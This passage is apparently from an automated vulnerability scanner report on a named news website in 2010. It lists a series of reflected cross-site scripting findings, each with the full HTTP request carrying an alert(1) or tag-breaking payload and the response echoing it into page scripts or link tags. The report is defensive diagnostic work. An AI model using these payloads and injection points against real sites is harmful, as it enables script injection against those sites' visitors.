Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 69281

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/2010-top-social-network-screw-ups-1832/?6cb8c"><a>756a7e7e28c=1/" />
...[SNIP]...

1.4. http://www.technewsdaily.com/2010-top-social-network-screw-ups-1832/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /2010-top-social-network-screw-ups-1832/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9049b'-alert(1)-'9d59cbaec90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2010-top-social-network-screw-ups-1832/?9049b'-alert(1)-'9d59cbaec90=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68919

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/2010-top-social-network-screw-ups-1832/?9049b'-alert(1)-'9d59cbaec90=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.5. http://www.technewsdaily.com/65-3d-hdtv-for-members-only-1830/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /65-3d-hdtv-for-members-only-1830/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 631de'-alert(1)-'8880f75d525 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /65-3d-hdtv-for-members-only-1830631de'-alert(1)-'8880f75d525/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40462

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/65-3d-hdtv-for-members-only-1830631de'-alert(1)-'8880f75d525/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.6. http://www.technewsdaily.com/65-3d-hdtv-for-members-only-1830/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /65-3d-hdtv-for-members-only-1830/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f066'-alert(1)-'1b2ef93fe7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /65-3d-hdtv-for-members-only-1830/?9f066'-alert(1)-'1b2ef93fe7a=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63610

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/65-3d-hdtv-for-members-only-1830/?9f066'-alert(1)-'1b2ef93fe7a=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.7. http://www.technewsdaily.com/65-3d-hdtv-for-members-only-1830/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /65-3d-hdtv-for-members-only-1830/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 297ea"><a>9214693a572 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /65-3d-hdtv-for-members-only-1830/?297ea"><a>9214693a572=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:54:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:54:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63972

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/65-3d-hdtv-for-members-only-1830/?297ea"><a>9214693a572=1/" />
...[SNIP]...

1.8. http://www.technewsdaily.com/about-us/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /about-us/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67f27'-alert(1)-'67b6821b517 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about-us67f27'-alert(1)-'67b6821b517/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40414

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/about-us67f27'-alert(1)-'67b6821b517/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.9. http://www.technewsdaily.com/about-us/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /about-us/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b383'-alert(1)-'f79fccaf2ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about-us/?4b383'-alert(1)-'f79fccaf2ba=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:58:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:58:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38777

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/about-us/?4b383'-alert(1)-'f79fccaf2ba=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.10. http://www.technewsdaily.com/android-30-honeycomb-appears-on-motorola-tablet-1762/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /android-30-honeycomb-appears-on-motorola-tablet-1762/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9bd6'-alert(1)-'a1e0d97980d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /android-30-honeycomb-appears-on-motorola-tablet-1762d9bd6'-alert(1)-'a1e0d97980d/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40502

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/android-30-honeycomb-appears-on-motorola-tablet-1762d9bd6'-alert(1)-'a1e0d97980d/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.11. http://www.technewsdaily.com/android-30-honeycomb-appears-on-motorola-tablet-1762/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /android-30-honeycomb-appears-on-motorola-tablet-1762/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dc8f"><a>f10d2117251 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /android-30-honeycomb-appears-on-motorola-tablet-1762/?4dc8f"><a>f10d2117251=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63019

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/android-30-honeycomb-appears-on-motorola-tablet-1762/?4dc8f"><a>f10d2117251=1/" />
...[SNIP]...

1.12. http://www.technewsdaily.com/android-30-honeycomb-appears-on-motorola-tablet-1762/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /android-30-honeycomb-appears-on-motorola-tablet-1762/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c73f8'-alert(1)-'f4a2f9a0cac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /android-30-honeycomb-appears-on-motorola-tablet-1762/?c73f8'-alert(1)-'f4a2f9a0cac=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62657

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/android-30-honeycomb-appears-on-motorola-tablet-1762/?c73f8'-alert(1)-'f4a2f9a0cac=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.13. http://www.technewsdaily.com/apple-brings-ipad-features-to-the-mac-with-lion-os-1473/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /apple-brings-ipad-features-to-the-mac-with-lion-os-1473/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28c0f'-alert(1)-'83bad171cd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apple-brings-ipad-features-to-the-mac-with-lion-os-147328c0f'-alert(1)-'83bad171cd3/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40508

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
ext/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/apple-brings-ipad-features-to-the-mac-with-lion-os-147328c0f'-alert(1)-'83bad171cd3/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.14. http://www.technewsdaily.com/apple-brings-ipad-features-to-the-mac-with-lion-os-1473/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /apple-brings-ipad-features-to-the-mac-with-lion-os-1473/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac700"><a>1a2bd182e0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /apple-brings-ipad-features-to-the-mac-with-lion-os-1473/?ac700"><a>1a2bd182e0a=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/apple-brings-ipad-features-to-the-mac-with-lion-os-1473/?ac700"><a>1a2bd182e0a=1/" />
...[SNIP]...

1.15. http://www.technewsdaily.com/apple-brings-ipad-features-to-the-mac-with-lion-os-1473/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /apple-brings-ipad-features-to-the-mac-with-lion-os-1473/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb0bd'-alert(1)-'aaf2054e1de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apple-brings-ipad-features-to-the-mac-with-lion-os-1473/?cb0bd'-alert(1)-'aaf2054e1de=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65122

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
t/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/apple-brings-ipad-features-to-the-mac-with-lion-os-1473/?cb0bd'-alert(1)-'aaf2054e1de=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.16. http://www.technewsdaily.com/archive/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /archive/

Issue detail

